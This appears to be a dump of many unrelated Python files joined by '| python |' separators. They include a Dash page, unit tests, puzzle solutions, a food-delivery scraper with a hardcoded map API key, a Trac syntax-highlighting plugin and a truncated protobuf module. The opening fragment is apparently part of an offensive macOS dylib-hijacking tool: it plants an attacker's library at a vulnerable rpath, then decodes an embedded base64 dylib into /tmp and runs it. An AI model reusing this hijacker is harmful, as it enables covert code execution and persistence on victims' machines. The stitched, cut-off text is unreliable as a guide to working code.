configuredDYLIB = os.path.split(attackerDYLIB)[0]+'/' + os.path.split(targetDYLIB)[1]
#dbg msg
print ' [+] configuring %%s to hijack %%s' %% (os.path.split(attackerDYLIB)[1], os.path.split(targetDYLIB)[1])
#check prereqs
# ->i.e. sanity checks
if not checkPrereqs(attackerDYLIB, targetDYLIB):
#err msg
print 'ERROR: prerequisite check failed\\n'
#bail
return ""
#configure the provide .dylib
if not configure(attackerDYLIB, targetDYLIB):
#err msg
print 'ERROR: failed to configure %%s\\n' %% (os.path.split(targetDYLIB)[1])
#bail
return ""
#dbg msg
print ' [+] copying configured .dylib to %%s' %% (configuredDYLIB)
#make a (local) copy w/ name
shutil.copy2(attackerDYLIB, configuredDYLIB)
os.remove(attackerDYLIB)
if not os.path.exists(os.path.split(vrpath)[0]):
os.makedirs(os.path.split(vrpath)[0])
os.chmod(configuredDYLIB, 0777)
shutil.copy2(configuredDYLIB, vrpath)
os.remove(configuredDYLIB)
#dbg msg
print '\\nHijacker created, renamed to %%s, and copied to %%s' %% (configuredDYLIB,vrpath)
import base64
import uuid
encbytes = "%s"
filename = str(uuid.uuid4())
path = "/tmp/" + filename + ".dylib"
decodedDylib = base64.b64decode(encbytes)
temp = open(path,'wb')
temp.write(decodedDylib)
temp.close()
run(path)
""" % (dylib,vrpath,encodedDylib)
return script
| python |
import dash_html_components as html
import dash_core_components as dcc
import dash_bootstrap_components as dbc
from dash.dependencies import Output,Input,State
from dash import no_update
import random
from flask_login import current_user
import time
from functools import wraps
from server import app
login_alert = dbc.Alert(
'User not logged in. Taking you to login.',
color='danger'
)
location = dcc.Location(id='page1-url',refresh=True)
def layout():
#if current_user.is_authenticated:
return dbc.Row(
dbc.Col(
[
location,
html.Div(id='page1-login-trigger'),
html.H1('Page1'),
html.Br(),
html.H5('Welcome to Page1!'),
html.Br(),
html.Div(id='page1-test-trigger'),
dcc.Loading(html.Iframe(id='page1-test',style=dict(height='500px',width='100%')),id='page1-loading')
],
width=6
)
)
@app.callback(
Output('page1-test','src'),
[Input('page1-test-trigger','children')]
)
def page1_test_update(trigger):
'''
updates iframe with example.com
'''
time.sleep(2)
return 'http://example.com/'
| python |
# -*- coding: utf-8 -*-
"""Namespace Service
The namespace service is responsible for
* Providing the default namespace from config
* Providing list of all known namespaces
"""
from typing import List
from brewtils.models import Garden, Request, System
import beer_garden.db.api as db
import beer_garden.config as config
def default() -> str:
"""Get the default namespace for this Garden
Returns:
The default namespace
"""
return config.get("garden.name")
def get_namespaces() -> List[str]:
"""Get the distinct namespaces in the Garden
Returns:
List of distinct namespace names known to this Garden and its child gardens
"""
namespaces = set(
set(db.distinct(Request, "namespace")) | set(db.distinct(System, "namespace"))
)
for garden in db.query(Garden, include_fields=["namespaces"]):
namespaces |= set(garden.namespaces)
# Filter out None, empty string
namespaces = filter(lambda x: x, namespaces)
return list(namespaces)
| python |
from dancingshoes.helpers import GlyphNamesFromFontLabFont, AssignFeatureCodeToFontLabFont
from myFP.features import MakeDancingShoes
f = fl.font
fl.output = ''
glyphnames = GlyphNamesFromFontLabFont(f)
shoes = MakeDancingShoes(glyphnames)
AssignFeatureCodeToFontLabFont(f, shoes)
# Verbose output
if shoes.Infos():
print shoes.Infos()
if shoes.Warnings():
print shoes.Warnings()
if shoes.Errors():
print shoes.Errors()
print 'I enjoyed dancing with you...'
| python |
# Copyright 2018 Xanadu Quantum Technologies Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Unit tests for the :mod:`pennylane_pq` device initialization
"""
import unittest
import logging as log
from defaults import pennylane as qml, BaseTest
from pennylane import DeviceError
from pennylane_pq.devices import ProjectQIBMBackend
import os
token = os.getenv("IBMQX_TOKEN")
log.getLogger('defaults')
class DeviceInitialization(BaseTest):
"""test aspects of the device initialization.
"""
num_subsystems = 4
devices = None
def test_ibm_no_token(self):
if self.args.device == 'ibm' or self.args.device == 'all':
self.assertRaises(ValueError, ProjectQIBMBackend, wires=self.num_subsystems, use_hardware=False)
def test_shots(self):
if self.args.device == 'ibm' or self.args.device == 'all':
shots = 5
dev1 = ProjectQIBMBackend(wires=self.num_subsystems, shots=shots, use_hardware=False, token=token, verbose=True)
self.assertEqual(shots, dev1.shots)
dev2 = ProjectQIBMBackend(wires=self.num_subsystems, num_runs=shots, use_hardware=False, token=token)
self.assertEqual(shots, dev2.shots)
dev2 = ProjectQIBMBackend(wires=self.num_subsystems, shots=shots+2, num_runs=shots, use_hardware=False,
token=token)
self.assertEqual(shots, dev2.shots)
def test_initialization_via_pennylane(self):
for short_name in [
'projectq.simulator',
'projectq.classical',
'projectq.ibm'
]:
try:
dev = qml.device(short_name, wires=2, token=token, verbose=True)
except DeviceError:
raise Exception("This test is expected to fail until pennylane-pq is installed.")
if __name__ == '__main__':
print('Testing PennyLane ProjectQ Plugin version ' + qml.version() + ', device initialization.')
# run the tests in this file
suite = unittest.TestSuite()
for t in (DeviceInitialization, ):
ttt = unittest.TestLoader().loadTestsFromTestCase(t)
suite.addTests(ttt)
unittest.TextTestRunner().run(suite)
| python |
#!/usr/bin/env python
# encoding: utf-8
# File : test_processor.py
# Author : Ben Wu
# Contact : [email protected]
# Date : 2019 Mar 06
#
# Description :
import sys
import os
sys.path.insert(1, "%s/../.." % os.path.dirname(os.path.abspath(__file__)))
from NanoUpTools.framework import processor
from NanoUpTools.framework.module import Module
from NanoUpTools.modules.QCD_HEMStudy import QCDHEMVeto
class temp(Module):
def analyze(self, events):
self.th1("NJetsISR" , events["nISRJets"] , 10 , 0 , 10)
self.th1("pu" , events["nISRJets"] , 10 , 0 , 10)
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description='Run the NanoUpTools test processor.')
parser.add_argument('--inputFiles', default="./TTbarInc.txt", help='text file listing the input files')
parser.add_argument('--outputFile', default="out.root")
args = parser.parse_args()
g = processor(args.outputFile, args.inputFiles, [temp("temp")], branches=["nISRJets"])
g.run()
| python |
#!/bin/python3
import os
# Complete the maximumPeople function below.
def maximumPeople(p, x, y, r):
# Return the maximum number of people that will be in a sunny town after removing exactly one cloud.
import operator
# make list of cloud tuples with start and end
clouds = []
for location_cloud, range_cloud in zip(y, r):
clouds.append((max(location_cloud - range_cloud, 0), location_cloud + range_cloud))
# sort by start
clouds.sort(key=lambda v: v[0])
# make list of town tuples with position and people
towns = []
for location_town, population_town in zip(x, p):
towns.append((location_town, population_town))
# sort by start
towns.sort(key=lambda v: v[0])
# add a ghost cloud so the whole sweep can be handled in a single loop
last_town_location = towns[-1][0]
last_cloud = clouds[-1][1]
ghost_location = max(last_town_location, last_cloud) + 100
# insert ghost cloud
clouds.append((ghost_location, ghost_location))
# end of the current cloud interval
current_end = -10 ** 9
# counter to check solely covered people by current cloud
covered = 0
# counter for people not covered by a cloud at all
uncovered = 0
# to remember maximum count
max_covered = 0
# index into the sorted towns list
t_idx = 0
# helper function to count people before a certain position
def count(pos, exc=False):
res = 0
nonlocal t_idx
# use either the strict less-than or the less-than-or-equal operator
op = operator.lt if exc else operator.le
while t_idx < len(towns) and op(towns[t_idx][0], pos):
# op: a<b or a<=b
res += towns[t_idx][1]
t_idx += 1
return res
# the actual algorithm
# there are three cases considered:
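# A small worked example (illustrative only): towns at positions 1, 5, 9 with
# populations 10, 20, 30 and clouds covering [0, 2] and [4, 6].
# Sweeping the sorted clouds: town 1 is solely covered by the first cloud
# (covered=10), town 5 solely by the second (covered=20), and town 9 is never
# covered (uncovered=30). Removing the best single cloud therefore gives
# max_covered + uncovered = 20 + 30 = 50.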
for start, end in clouds:
# next cloud start after the end of old cloud
if start > current_end:
covered += count(current_end)
max_covered = max(max_covered, covered)
covered = 0
uncovered += count(start, exc=True)
current_end = end
# next cloud starts and ends before the next cloud
elif start <= current_end and end < current_end:
covered += count(start, exc=True)
count(end)
# or it start before but ends later
elif start <= current_end <= end:
covered += count(start, exc=True)
max_covered = max(max_covered, covered)
covered = 0
count(current_end)
current_end = end
return max_covered + uncovered
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
n = int(input())
p = list(map(int, input().rstrip().split()))
x = list(map(int, input().rstrip().split()))
m = int(input())
y = list(map(int, input().rstrip().split()))
r = list(map(int, input().rstrip().split()))
result = maximumPeople(p, x, y, r)
fptr.write(str(result) + '\n')
fptr.close()
| python |
from .subsample import ExtractPatches
from .augment import Flip_Rotate_2D, Shift_Squeeze_Intensities, Flip_Rotate_3D, MaskData | python |
import requests
class Config:
ak = "PmkYQbXLGxqHnQvRktDZCGMSHGOil2Yx"
ride_url_temp = "http://api.map.baidu.com/direction/v2/riding?origin={},{}&destination={},{}&ak={}"
baidu_map_url_temp = "http://api.map.baidu.com/geocoding/v3/?address={}&output=json&ak={}"
wm_get_url = "https://apimobile.meituan.com/group/v4/poi/pcsearch/278"
def ride_indication(address, shop_list):
final_list = []
for (index, good) in enumerate(shop_list):
shop = {}
shop["title"] = good["title"]
shop["address"] = good["address"]
shop["latitude"] = good["latitude"]
shop["longitude"] = good["longitude"]
final_list.append(shop)
print(index, good["title"], good["address"])
orig_lat = str("%.6f" % float(address[0]))
orig_lng = str("%.6f" % float(address[1]))
# print(orig_lat, orig_lng)
index = int(input("请输入选择的序号:"))
shop = final_list[index]
des_lat = shop["latitude"]
des_lng = shop["longitude"]
ride_url = Config.ride_url_temp.format(orig_lat, orig_lng, des_lat, des_lng, Config.ak)
route_resp = requests.get(ride_url)
# print(route_resp.json()["result"]["routes"]["steps"])
result = route_resp.json()["result"]
step_list = result["routes"][0]["steps"]
for step in step_list:
print(step["instructions"], step["turn_type"])
def meituan_get(key):
lat, lng = get_address()
get_header = {
"uuid": "5DBAEC411BBD1E5C20EE784F5827EDA5B8E62FB5197A319B67812B49E6634DE0",
"myLng": lng,
"utm_medium": "iphone",
"myLat": lat,
"open_id": "oJVP50OIunB7-0GeCAihfS71QT5g",
"User-Agent" : "Mozilla/5.0 (iPhone; CPU iPhone OS 12_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/16A366 MicroMessenger/7.0.10(0x17000a21) NetType/WIFI Language/zh_CN"
}
get_params = {
"limit": "15",
"mypos": "{},{}".format(lat, lng),
"cityId": "278",
"q": key
}
# get
get_resp = requests.get(Config.wm_get_url, params=get_params, headers=get_header, verify=False)
result_list = get_resp.json()["data"]["searchResult"]
ride_indication((lat, lng), result_list)
def meituan_post():
post_params = {
"wm_dtype": "iPhone 8 Plus (GSM+CDMA)<iPhone10,2>",
"wm_uuid": "1122100804401172552",
"wm_longitude": "110260609",
"wm_latitude": "21375185",
"wm_visitid": "223e025a-0d62-4483-802b-2d7886a9b63c",
"wm_appversion": "5.2.1",
"req_time": "1581776426207",
"keyword": "烧烤",
"sort_type": "0",
"page_index": "0",
"query_type": "1",
"sub_category_type": "0",
"category_type": "0"
}
post_header = {
"Host": "wx.waimai.meituan.com",
"uuid": "1122100804401172552",
"Referer": "https://servicewechat.com/wx2c348cf579062e56/239/page-frame.html",
"wm-ctype": "wxapp",
"User-Agent" : "Mozilla/5.0 (iPhone; CPU iPhone OS 12_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/16A366 MicroMessenger/7.0.10(0x17000a21) NetType/WIFI Language/zh_CN"
}
# post
post_url = "https://wx.waimai.meituan.com/weapp/v2/search/v9/poi"
post_resp = requests.post(post_url, data=post_params, headers=post_header, verify=False)
print(post_resp.status_code)
# print(post_resp.json())
def get_address():
address = input("请输入要搜索地点:")
baidu_map_url = Config.baidu_map_url_temp.format(address, Config.ak)
resp = requests.get(baidu_map_url)
result = resp.json()["result"]
print(result["location"]["lng"], result["location"]["lat"])
lng = str(result["location"]["lng"])
lat = str(result["location"]["lat"])
return (lat, lng)
if __name__ == '__main__':
key = input("请输入要搜索的关键字:")
meituan_get(key) | python |
import datetime
import time
import iso8601
import psycopg2
from temba_client.v2 import TembaClient
RAPIDPRO_URL = "https://rapidpro.prd.momconnect.co.za/"
RAPIDPRO_TOKEN = ""
DB = {
"dbname": "ndoh_rapidpro",
"user": "ndoh_rapidpro",
"port": 7000,
"host": "localhost",
"password": "",
}
if __name__ == "__main__":
rapidpro_client = TembaClient(RAPIDPRO_URL, RAPIDPRO_TOKEN)
conn = psycopg2.connect(**DB)
cursor = conn.cursor("contacts")
mapping_cursor = conn.cursor()
mapping_cursor.execute(
"""
SELECT key, uuid
FROM contacts_contactfield
WHERE org_id=5
"""
)
field_mapping = dict(mapping_cursor)
now = datetime.date.today()
print("Processing contacts...") # noqa
cursor.execute(
"""
SELECT
distinct contacts_contact.id,
contacts_contact.uuid,
contacts_contact.fields,
contacts_contactgroup.id,
contacts_contact.created_on
FROM contacts_contactgroup,
campaigns_campaign,
contacts_contactgroup_contacts
left outer join campaigns_eventfire
on campaigns_eventfire.contact_id =
contacts_contactgroup_contacts.contact_id,
contacts_contact
WHERE contacts_contactgroup.org_id = 5
and contacts_contactgroup.id in (326, 327, 328, 329, 330, 331, 332)
AND campaigns_campaign.group_id = contacts_contactgroup.id
and contacts_contactgroup_contacts.contactgroup_id = contacts_contactgroup.id
and campaigns_eventfire.contact_id is null
and contacts_contactgroup_contacts.contact_id = contacts_contact.id
"""
)
total = 0
updated = 0
contact_id = 0
start, d_print = time.time(), time.time()
for (contact_id, contact_uuid, fields, group_id, created_on) in cursor:
should_receive_msgs = False
fields_to_update = {}
date_value = fields.get(field_mapping["edd"], {}).get("datetime")
text_value = fields.get(field_mapping["edd"], {}).get("text")
if date_value:
date_obj = iso8601.parse_date(date_value)
delta = datetime.date.today() - date_obj.date()
if delta.days <= 11:
should_receive_msgs = True
fields_to_update["edd"] = text_value
if should_receive_msgs:
updated += 1
rapidpro_client.update_contact(contact_uuid, fields=fields_to_update)
if time.time() - d_print > 1:
print( # noqa
f"\rProcessed {updated}/{total} contacts at "
f"{total/(time.time() - start):.0f}/s - ({contact_id})",
end="",
)
d_print = time.time()
total += 1
print( # noqa
f"\rProcessed {updated}/{total} contacts at "
f"{total/(time.time() - start):.0f}/s - ({contact_id})"
)
| python |
# -*- coding: utf-8 -*-
#
# Copyright (C) 2006-2009 Edgewall Software
# Copyright (C) 2006 Matthew Good <[email protected]>
# All rights reserved.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution. The terms
# are also available at http://trac.edgewall.org/wiki/TracLicense.
#
# Author: Matthew Good <[email protected]>
from __future__ import absolute_import
import os
import pygments
import re
from datetime import datetime
from pkg_resources import resource_filename
from pygments.formatters.html import HtmlFormatter
from pygments.lexers import get_all_lexers, get_lexer_by_name
from pygments.styles import get_all_styles, get_style_by_name
from trac.core import *
from trac.config import ConfigSection, ListOption, Option
from trac.env import ISystemInfoProvider
from trac.mimeview.api import IHTMLPreviewRenderer, Mimeview
from trac.prefs import IPreferencePanelProvider
from trac.util import get_pkginfo, lazy
from trac.util.datefmt import http_date, localtz
from trac.util.translation import _
from trac.web.api import IRequestHandler, HTTPNotFound
from trac.web.chrome import ITemplateProvider, add_notice, add_stylesheet
from genshi import QName, Stream
from genshi.core import Attrs, START, END, TEXT
__all__ = ['PygmentsRenderer']
class PygmentsRenderer(Component):
"""HTML renderer for syntax highlighting based on Pygments."""
implements(ISystemInfoProvider, IHTMLPreviewRenderer,
IPreferencePanelProvider, IRequestHandler,
ITemplateProvider)
is_valid_default_handler = False
pygments_lexer_options = ConfigSection('pygments-lexer',
"""Configure Pygments [%(url)s lexer] options.
For example, to set the
[%(url)s#lexers-for-php-and-related-languages PhpLexer] options
`startinline` and `funcnamehighlighting`:
{{{#!ini
[pygments-lexer]
php.startinline = True
php.funcnamehighlighting = True
}}}
The lexer name is derived from the class name, with `Lexer` stripped
from the end. The lexer //short names// can also be used in place
of the lexer name.
""" % {'url': 'http://pygments.org/docs/lexers/'})
default_style = Option('mimeviewer', 'pygments_default_style', 'trac',
"""The default style to use for Pygments syntax highlighting.""")
pygments_modes = ListOption('mimeviewer', 'pygments_modes',
'', doc=
"""List of additional MIME types known by Pygments.
For each, a tuple `mimetype:mode:quality` has to be
specified, where `mimetype` is the MIME type,
`mode` is the corresponding Pygments mode to be used
for the conversion and `quality` is the quality ratio
associated to this conversion. That can also be used
to override the default quality ratio used by the
Pygments render.""")
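# Illustrative (assumed) trac.ini entry using the mimetype:mode:quality tuple
# format described above; the MIME type here is made up for the example:
#   [mimeviewer]
#   pygments_modes = text/x-mymarkup:html:8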
expand_tabs = True
returns_source = True
QUALITY_RATIO = 7
EXAMPLE = """<!DOCTYPE html>
<html lang="en">
<head>
<title>Hello, world!</title>
<script>
jQuery(document).ready(function($) {
$("h1").fadeIn("slow");
});
</script>
</head>
<body>
<h1>Hello, world!</h1>
</body>
</html>"""
# ISystemInfoProvider methods
def get_system_info(self):
version = get_pkginfo(pygments).get('version')
# if installed from source, fall back to the hardcoded version info
if not version and hasattr(pygments, '__version__'):
version = pygments.__version__
yield 'Pygments', version
# IHTMLPreviewRenderer methods
def get_extra_mimetypes(self):
for _, aliases, _, mimetypes in get_all_lexers():
for mimetype in mimetypes:
yield mimetype, aliases
def get_quality_ratio(self, mimetype):
# Extend default MIME type to mode mappings with configured ones
try:
return self._types[mimetype][1]
except KeyError:
return 0
def render(self, context, mimetype, content, filename=None, rev=None):
req = context.req
style = req.session.get('pygments_style', self.default_style)
add_stylesheet(req, '/pygments/%s.css' % style)
try:
if len(content) > 0:
mimetype = mimetype.split(';', 1)[0]
language = self._types[mimetype][0]
return self._generate(language, content, context)
except (KeyError, ValueError):
raise Exception("No Pygments lexer found for mime-type '%s'."
% mimetype)
# IPreferencePanelProvider methods
def get_preference_panels(self, req):
yield 'pygments', _('Syntax Highlighting')
def render_preference_panel(self, req, panel):
styles = list(get_all_styles())
if req.method == 'POST':
style = req.args.get('style')
if style and style in styles:
req.session['pygments_style'] = style
add_notice(req, _("Your preferences have been saved."))
req.redirect(req.href.prefs(panel or None))
for style in sorted(styles):
add_stylesheet(req, '/pygments/%s.css' % style, title=style.title())
output = self._generate('html', self.EXAMPLE)
return 'prefs_pygments.html', {
'output': output,
'selection': req.session.get('pygments_style', self.default_style),
'styles': styles
}
# IRequestHandler methods
def match_request(self, req):
match = re.match(r'/pygments/(\w+)\.css', req.path_info)
if match:
req.args['style'] = match.group(1)
return True
def process_request(self, req):
style = req.args['style']
try:
style_cls = get_style_by_name(style)
except ValueError as e:
raise HTTPNotFound(e)
parts = style_cls.__module__.split('.')
filename = resource_filename('.'.join(parts[:-1]), parts[-1] + '.py')
mtime = datetime.fromtimestamp(os.path.getmtime(filename), localtz)
last_modified = http_date(mtime)
if last_modified == req.get_header('If-Modified-Since'):
req.send_response(304)
req.end_headers()
return
formatter = HtmlFormatter(style=style_cls)
content = u'\n\n'.join([
formatter.get_style_defs('div.code pre'),
formatter.get_style_defs('table.code td')
]).encode('utf-8')
req.send_response(200)
req.send_header('Content-Type', 'text/css; charset=utf-8')
req.send_header('Last-Modified', last_modified)
req.send_header('Content-Length', len(content))
req.write(content)
# ITemplateProvider methods
def get_htdocs_dirs(self):
return []
def get_templates_dirs(self):
return [resource_filename('trac.mimeview', 'templates')]
# Internal methods
@lazy
def _lexer_alias_name_map(self):
lexer_alias_name_map = {}
for lexer_name, aliases, _, _ in get_all_lexers():
name = aliases[0] if aliases else lexer_name
for alias in aliases:
lexer_alias_name_map[alias] = name
return lexer_alias_name_map
@lazy
def _lexer_options(self):
lexer_options = {}
for key, lexer_option_value in self.pygments_lexer_options.options():
try:
lexer_name_or_alias, lexer_option_name = key.split('.')
except ValueError:
pass
else:
lexer_name = self._lexer_alias_to_name(lexer_name_or_alias)
lexer_option = {lexer_option_name: lexer_option_value}
lexer_options.setdefault(lexer_name, {}).update(lexer_option)
return lexer_options
@lazy
def _types(self):
types = {}
for lexer_name, aliases, _, mimetypes in get_all_lexers():
name = aliases[0] if aliases else lexer_name
for mimetype in mimetypes:
types[mimetype] = (name, self.QUALITY_RATIO)
# Pygments < 1.4 doesn't know application/javascript
if 'application/javascript' not in types:
js_entry = self._types.get('text/javascript')
if js_entry:
types['application/javascript'] = js_entry
types.update(Mimeview(self.env).configured_modes_mapping('pygments'))
return types
def _generate(self, language, content, context=None):
lexer_name = self._lexer_alias_to_name(language)
lexer_options = {'stripnl': False}
lexer_options.update(self._lexer_options.get(lexer_name, {}))
if context:
lexer_options.update(context.get_hint('lexer_options', {}))
lexer = get_lexer_by_name(lexer_name, **lexer_options)
return GenshiHtmlFormatter().generate(lexer.get_tokens(content))
def _lexer_alias_to_name(self, alias):
return self._lexer_alias_name_map.get(alias, alias)
class GenshiHtmlFormatter(HtmlFormatter):
"""A Pygments formatter subclass that generates a Python stream instead
of writing markup as strings to an output file.
"""
def _chunk(self, tokens):
"""Groups tokens with the same CSS class in the token stream
and yields them one by one, along with the CSS class, with the
values chunked together."""
last_class = None
text = []
for ttype, value in tokens:
c = self._get_css_class(ttype)
if c == 'n':
c = ''
if c == last_class:
text.append(value)
continue
# If no value, leave the old <span> open.
if value:
yield last_class, u''.join(text)
text = [value]
last_class = c
if text:
yield last_class, u''.join(text)
def generate(self, tokens):
pos = None, -1, -1
span = QName('span')
class_ = QName('class')
def _generate():
for c, text in self._chunk(tokens):
if c:
attrs = Attrs([(class_, c)])
yield START, (span, attrs), pos
yield TEXT, text, pos
yield END, span, pos
else:
yield TEXT, text, pos
return Stream(_generate())
| python |
#!/usr/bin/env python
# -- coding: utf-8 --
"""
@AUTHOR : zlikun <[email protected]>
@DATE : 2019/03/01 17:03:55
@DESC : Add Two Numbers (sum two non-negative integers stored as linked lists)
"""
class ListNode:
def __init__(self, x):
self.val = x
self.next = None
# Definition for singly-linked list.
# class ListNode:
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution:
def addTwoNumbers(self, m: ListNode, n: ListNode) -> ListNode:
if not m:
return n
if not n:
return m
carry = 0
head = ListNode(None)
curr = head
while m or n:
t = carry
if m:
t += m.val
m = m.next
if n:
t += n.val
n = n.next
curr.val = t % 10
carry = t // 10
node = ListNode(carry)
if m or n or carry > 0:
curr.next, curr = node, node
return head
def traverse(head: "ListNode"):
while head:
print(head.val, end="\t")
head = head.next
print()
def test1():
m = ListNode(2)
m.next = ListNode(4)
m.next.next = ListNode(3)
traverse(m)
n = ListNode(5)
n.next = ListNode(6)
n.next.next = ListNode(4)
traverse(n)
traverse(Solution().addTwoNumbers(m, n))
def test2():
m = ListNode(5)
traverse(m)
n = ListNode(5)
traverse(n)
traverse(Solution().addTwoNumbers(m, n))
if __name__ == '__main__':
test1()
print('-' * 32)
test2()
| python |
#-*- coding: utf-8 -*-
from api.management.commands.importbasics import *
def import_idols(opt):
local, redownload = opt['local'], opt['redownload']
idols = models.Idol.objects.all().order_by('-main', '-main_unit')
for idol in raw_information.keys():
card = models.Card.objects.filter(name=idol).order_by('id')[0]
raw_information[idol]['main'] = True
idol, created = models.Idol.objects.update_or_create(name=idol, defaults=raw_information[idol])
for n in raw_information_n.keys():
idol, created = models.Idol.objects.update_or_create(name=n, defaults=raw_information_n[n])
if not local:
print "### Import idols"
for idol in idols:
if not idol:
continue
if idol.attribute and not redownload:
continue
print ' Import Idol', idol, '...',
f = urllib2.urlopen('http://decaf.kouhi.me/lovelive/index.php?title=' + urllib.quote(idol.name))
soup = BeautifulSoup(f.read())
html = soup.find('div', { 'id': 'mw-content-text'})
if html is not None:
html.find('div', {'id': 'toc'}).extract()
defaults = {}
wikitable = None
if idol.main:
wikitable = html.find('table', { 'class': 'wikitable' })
if idol.main_unit == 'Aqours':
defaults['school'] = 'Uranohoshi Girls\' High School'
else:
defaults['school'] = 'Otonokizaka Academy'
ul_ = html.find('ul')
ul = ul_.find_all('li')
for li in ul:
if li.b is not None:
title = clean(clean(li.b.extract().text).replace(':', ''))
content = clean(li.text)
if title is not None and content is not None and content != '?' and content != ' ?' and content != 'B? / W? / H?' and content != '' and content != '?cm':
if title == 'Age':
defaults['age'] = content
elif title == 'Birthday':
split = content.replace(')', '').split('(')
birthday = dateutil.parser.parse(clean(split[0]))
sign = clean(split[-1])
defaults['birthday'] = birthday
defaults['astrological_sign'] = sign
elif title == 'Japanese Name':
defaults['japanese_name'] = content
elif title == 'Blood Type':
defaults['blood'] = content
elif title == 'Height':
defaults['height'] = content.replace('cm', '')
elif title == 'Three Sizes':
defaults['measurements'] = content
elif title == 'Favorite Food' or title == 'Favorite Foods':
defaults['favorite_food'] = content
elif title == 'Least Favorite Food' or title == 'Least Favorite Foods':
defaults['least_favorite_food'] = content
elif title == 'Hobbies':
defaults['hobbies'] = content
elif title == 'Main Attribute':
defaults['attribute'] = content
elif title == 'Year':
defaults['year'] = content
elif title == 'Former School':
defaults['school'] = content
elif title == 'CV':
defaults['cv'] = content
if li.a:
defaults['cv_url'] = li.a.get('href')
else:
print '/!\\ Unknown content', title, content
if wikitable is not None:
ps = wikitable.find_all('p')
if len(ps) >= 2:
if ps[0].br is not None:
ps[0].br.extract()
defaults['summary'] = clean(ps[0].text)
if ps[1].a is not None:
url = ps[1].a.get('href')
defaults['official_url'] = url
if idol.main:
tables = html.find_all('table', { 'class': 'wikitable' })
for table in tables:
th = table.find('th', { 'colspan': '6' })
if th is not None:
text = th.find('span').text
if '(' in text and '#' in text:
name = text.split('(')[1].split(')')[0]
name = name.replace(' Ver.', '').strip()
id_card = int(text.split('#')[-1].replace(']', ''))
print 'Set collection', name, 'for #', str(id_card)
models.Card.objects.filter(pk=id_card).update(translated_collection=name)
idol, created = models.Idol.objects.update_or_create(name=idol, defaults=defaults)
f.close()
print 'Done'
class Command(BaseCommand):
can_import_settings = True
def handle(self, *args, **options):
opt = opt_parse(args)
import_idols(opt)
import_raw_db()
| python |
#-*- coding:utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
# Copyright (C) 2013-2015 Akretion (http://www.akretion.com)
from . import wizard
| python |
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: rastervision/protos/task.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from rastervision.protos import class_item_pb2 as rastervision_dot_protos_dot_class__item__pb2
from google.protobuf import struct_pb2 as google_dot_protobuf_dot_struct__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='rastervision/protos/task.proto',
package='rv.protos',
syntax='proto2',
serialized_pb=_b('\n\x1erastervision/protos/task.proto\x12\trv.protos\x1a$rastervision/protos/class_item.proto\x1a\x1cgoogle/protobuf/struct.proto\"\x9e\x0b\n\nTaskConfig\x12\x11\n\ttask_type\x18\x01 \x02(\t\x12\x1e\n\x12predict_batch_size\x18\x02 \x01(\x05:\x02\x31\x30\x12\x1b\n\x13predict_package_uri\x18\x03 \x01(\t\x12\x13\n\x05\x64\x65\x62ug\x18\x04 \x01(\x08:\x04true\x12\x19\n\x11predict_debug_uri\x18\x05 \x01(\t\x12N\n\x17object_detection_config\x18\x06 \x01(\x0b\x32+.rv.protos.TaskConfig.ObjectDetectionConfigH\x00\x12T\n\x1a\x63hip_classification_config\x18\x07 \x01(\x0b\x32..rv.protos.TaskConfig.ChipClassificationConfigH\x00\x12X\n\x1csemantic_segmentation_config\x18\x08 \x01(\x0b\x32\x30.rv.protos.TaskConfig.SemanticSegmentationConfigH\x00\x12\x30\n\rcustom_config\x18\t \x01(\x0b\x32\x17.google.protobuf.StructH\x00\x1a\xb2\x03\n\x15ObjectDetectionConfig\x12)\n\x0b\x63lass_items\x18\x01 \x03(\x0b\x32\x14.rv.protos.ClassItem\x12\x11\n\tchip_size\x18\x02 \x02(\x05\x12M\n\x0c\x63hip_options\x18\x03 \x02(\x0b\x32\x37.rv.protos.TaskConfig.ObjectDetectionConfig.ChipOptions\x12S\n\x0fpredict_options\x18\x04 \x02(\x0b\x32:.rv.protos.TaskConfig.ObjectDetectionConfig.PredictOptions\x1ao\n\x0b\x43hipOptions\x12\x11\n\tneg_ratio\x18\x01 \x02(\x02\x12\x17\n\nioa_thresh\x18\x02 \x01(\x02:\x03\x30.8\x12\x1b\n\rwindow_method\x18\x03 \x01(\t:\x04\x63hip\x12\x17\n\x0clabel_buffer\x18\x04 \x01(\x02:\x01\x30\x1a\x46\n\x0ePredictOptions\x12\x19\n\x0cmerge_thresh\x18\x02 \x01(\x02:\x03\x30.5\x12\x19\n\x0cscore_thresh\x18\x03 \x01(\x02:\x03\x30.5\x1aX\n\x18\x43hipClassificationConfig\x12)\n\x0b\x63lass_items\x18\x01 \x03(\x0b\x32\x14.rv.protos.ClassItem\x12\x11\n\tchip_size\x18\x02 \x02(\x05\x1a\xbf\x03\n\x1aSemanticSegmentationConfig\x12)\n\x0b\x63lass_items\x18\x01 \x03(\x0b\x32\x14.rv.protos.ClassItem\x12\x11\n\tchip_size\x18\x02 \x02(\x05\x12R\n\x0c\x63hip_options\x18\x03 \x02(\x0b\x32<.rv.protos.TaskConfig.SemanticSegmentationConfig.ChipOptions\x12\x1c\n\x11predict_chip_size\x18\x04 \x01(\x05:\x01\x30\x1a\xf0\x01\n\x0b\x43hipOptions\x12$\n\rwindow_method\x18\x01 \x01(\t:\rrandom_sample\x12\x16\n\x0etarget_classes\x18\x02 \x03(\x05\x12$\n\x16\x64\x65\x62ug_chip_probability\x18\x03 